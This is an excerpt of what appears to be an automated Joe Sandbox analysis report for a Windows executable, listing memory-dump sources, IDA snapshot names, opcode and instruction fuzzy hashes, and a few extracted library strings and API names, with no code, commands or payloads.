                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $header crc mismatch$unknown header flags set
                                                                                                                                                                                                                                                        • API String ID: 0-1127688429
                                                                                                                                                                                                                                                        • Opcode ID: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                        • Instruction ID: be87021cba55471a64feb8b347fe15805716fb1c10986716e3cb897f0959ff60
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4bf022b898153f2a381bcd878a50a5d3c06b36ca84da26d2d0edcb3d1e551c0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43F19172A1A3D58BE7A58F15C088A3A7AE9FF48744F05C538DB49877A0EF78E950C740
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        • Opcode ID: e29282b711dd5704c0e64fe7638cddbeeb7149a3015151b68882fd3146651568
                                                                                                                                                                                                                                                        • Instruction ID: 52168427e8fe67c0f9f1176c74d71392de1492c785bdae1f9332ffe1333f58cc
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e29282b711dd5704c0e64fe7638cddbeeb7149a3015151b68882fd3146651568
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4B126B3A05B898BEB158F2DC8563687BA0F748B48F188922DB5D837B4DF39D851D700
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: $
                                                                                                                                                                                                                                                        • API String ID: 0-227171996
                                                                                                                                                                                                                                                        • Opcode ID: 5ebab5a2817f928350dc9776a3da4b540f16bc97e78530f340af468d76ff9f5e
                                                                                                                                                                                                                                                        • Instruction ID: 64022b00ee93e7dbcd4c977c3d26ee4f7d1c474fcf2929615177c197c11af0a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5ebab5a2817f928350dc9776a3da4b540f16bc97e78530f340af468d76ff9f5e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ADE1C372A4A64682EB688E25805017D33A0FF4DB48F244335DB4E877B8EF39EA51C748
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: incorrect header check$invalid window size
                                                                                                                                                                                                                                                        • API String ID: 0-900081337
                                                                                                                                                                                                                                                        • Opcode ID: 8c4c8a6a705a7cf803fa5291bdc529627e531fe0bdcc095ab807ab19af6e2c49
                                                                                                                                                                                                                                                        • Instruction ID: 236824e4607d6ac7d083b2fe1cc7bd571b787037c804b926039d1c34607c700e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8c4c8a6a705a7cf803fa5291bdc529627e531fe0bdcc095ab807ab19af6e2c49
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73919772A192D58BE7A58F14D448B3E3AA9FB48354F118139DB4A867E4EF3CE584CB00
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: e+000$gfff
                                                                                                                                                                                                                                                        • API String ID: 0-3030954782
                                                                                                                                                                                                                                                        • Opcode ID: ab39e04084c8b9065030c447a5361eb1aff85978d5a2f70618a83e2e92251626
                                                                                                                                                                                                                                                        • Instruction ID: ffa69feeb4ef985bfbf83934bab941b0fbb2aef2367535d1a5349d2653aaccc2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ab39e04084c8b9065030c447a5361eb1aff85978d5a2f70618a83e2e92251626
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1516662B192C546E7208A35D800769BB91F748B94F488332CBA887BE5EF3ED5418704
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: gfffffff
                                                                                                                                                                                                                                                        • API String ID: 0-1523873471
                                                                                                                                                                                                                                                        • Opcode ID: 1e22957b1159dd03df7ccd337d5a67203babfefd7ac1e182ea12ea91d3eef3d6
                                                                                                                                                                                                                                                        • Instruction ID: 9c1b6c6764db18b31a97ce30c22dc19d6d6354daf9d65a23ff45ac46d2247695
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1e22957b1159dd03df7ccd337d5a67203babfefd7ac1e182ea12ea91d3eef3d6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82A148A3B1A7C586EB21CF25A4007B97B91EB58B84F058231DF4D877A5EE3DE601C705
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: TMP
                                                                                                                                                                                                                                                        • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                        • Opcode ID: 2d09a8d0b3f9f3e3f4726bcb3549591c54293473ccc366ec5b1b4d61c621e7ad
                                                                                                                                                                                                                                                        • Instruction ID: 431ae94e9532ce74a8a64a8cfe3e7ebf867af02f4c41ad024694ea6c527ced75
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2d09a8d0b3f9f3e3f4726bcb3549591c54293473ccc366ec5b1b4d61c621e7ad
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F51A111F0A74241FA68AB2759111BA5295EF4DBC4F888235DF0ECB7B6FE3DE6418208
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: HeapProcess
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 54951025-0
                                                                                                                                                                                                                                                        • Opcode ID: b79ea0c05b8e708bf2e7ff1fe6aa0946c24d08db99ce40c7e012d78a6a9acfe9
                                                                                                                                                                                                                                                        • Instruction ID: 3f6d58f95d6c00bcce694611bf2a592044c0075fda796a491de75638b40f6851
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b79ea0c05b8e708bf2e7ff1fe6aa0946c24d08db99ce40c7e012d78a6a9acfe9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1BB09220E1BA46C6EA482F966C8221422A4BF4C740F964038C64D81330FE2C21B65700
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: a25825d834791a15779abc5a96815a53d20fd0a8b1de7024d724f2c7a0ffd609
                                                                                                                                                                                                                                                        • Instruction ID: 032a30907f7a1194f78d7ac8f61805fc48a09f16511b320b1d3a1691c74a198b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a25825d834791a15779abc5a96815a53d20fd0a8b1de7024d724f2c7a0ffd609
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1E1CF36A4A64682EA688A25C14413D27A1FF58B54F248335DF0E877FDEF3DEA51C348
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 92f5019cce735186dcbe47a7940729bb5e8d7af8c1d6157f075a5e7b95ae45a8
                                                                                                                                                                                                                                                        • Instruction ID: 96ece59579105f42578725c97faa3fb3b30e112184e9fb95c232a39ff375eebe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92f5019cce735186dcbe47a7940729bb5e8d7af8c1d6157f075a5e7b95ae45a8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CCE1C572A0964285E7688A29C1553BC27E1FB8DB54F148335CB4E872F5EF39EA41C348
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 86da56c12cd563bcad921fbd71c05d3fa176844b52d15b5090a52c27ad8a5c54
                                                                                                                                                                                                                                                        • Instruction ID: b6a7c37c0e40deec499e53db8f7d939e0f3239ed872d42c782960e4da9dd3f71
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 86da56c12cd563bcad921fbd71c05d3fa176844b52d15b5090a52c27ad8a5c54
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28D1D372A0A64685EB688A29855027D27E0FF8DB48F144335DF0F876B4EF3DEA55C348
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8e0142d1de63ac36c46e431d0d75baaff102e1c1a7ac2c303afc5037c5988706
                                                                                                                                                                                                                                                        • Instruction ID: 3c3946b9866377b7c404e6e721833c7bd6fb886fe759884edb68d3724dc4722d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e0142d1de63ac36c46e431d0d75baaff102e1c1a7ac2c303afc5037c5988706
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21C1A9722141E14BD299DB29E46A57B77E1F7D8389BC4803ADF8B47B85CA3CE014D711
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: b5780ef2d000dcd486574e33efb2770a379a55a34775bc5a7b80e7b31bbd7158
                                                                                                                                                                                                                                                        • Instruction ID: cb086bd19895c0b13b960df2ddb8b2f416b61a40f5f2efd35dffff2ce71bf316
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5780ef2d000dcd486574e33efb2770a379a55a34775bc5a7b80e7b31bbd7158
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D9B1A072A0A74586E765CF39C05027D3BA4EB4DB48F144235DB4E877A5EF39E640CB18
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                        • Instruction ID: 58b25dc57740ff080c66307563b8f109dacef3902601a711fa1f8d602959786c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 56ef1490d9aa7cb50fdbcb208ea1e35327a83dacbd264ffe23c56c6782292f60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87B16D72A0A78686E7658F39C05027C3BA0E75DB48F684235CB4E873A5EF39DA41C749
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                        • Instruction ID: c837e35905c19c59fe0d1b2875a6d58197b212e59e04bd3f5cbe618d03ee8dad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a05c6059b1d422c1c0961fd67960772ff2ba502e6a05041136868912dff4d23
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1581E472A0978186EB74CB19A4403BA6690FB4D794F544339DB9D87BA9EF3ED6008B04
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1967249931.00007FF6ABA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6ABA40000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967206191.00007FF6ABA40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967298505.00007FF6ABA6D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967344438.00007FF6ABA84000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1967509711.00007FF6ABA86000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6aba40000_main.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: eef01635753a3689cfd7199ced0fb7e0b5b43189aa21453eecf28f9410e22187
